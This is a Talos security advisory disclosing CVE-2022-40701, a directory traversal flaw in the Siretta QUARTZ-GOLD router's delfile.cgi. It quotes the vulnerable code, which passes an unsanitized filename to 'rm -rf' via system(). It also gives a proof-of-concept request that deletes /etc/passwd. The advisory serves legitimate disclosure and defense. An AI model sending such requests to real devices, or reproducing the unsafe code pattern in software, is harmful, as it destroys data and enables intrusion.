Talos Vulnerability Report

TALOS-2022-1606

Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability

January 26, 2023
CVE Number

CVE-2022-40701

SUMMARY

A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

PRODUCT URLS

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

CVSSv3 SCORE

6.5 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

void delfile.cgi(void)

{
  [...]

  [... calculate the value of the base_folder variable ...]
  _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
  filename_ = "";
  if (_filename_param != (char *)0x0) {
    filename_ = _filename_param;
  }
  if (*filename_ != '\0') {
    sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
    system(command_buff);                                                                                       [3]
  }
  [...]
}

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and then used at [2]. From the fetch of the _filename parameter, at [1], to its usage at [2] there is no sanitization of the parameter. Then at [3] the string rm -rf <base_folder>/<_filename> is used as parameter of the system function. This functionality is vulnerable to a path traversal, allowing the deletion of arbitrary files in the file-system.

Exploit Proof of Concept

For example, sending the following request:

POST /delfile.cgi HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 55

_filename=../../etc/passwd&_http_id=<the correct tid>

would prohibit access with SSH.

TIMELINE

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.

TALOS-2022-1607

TALOS-2022-1605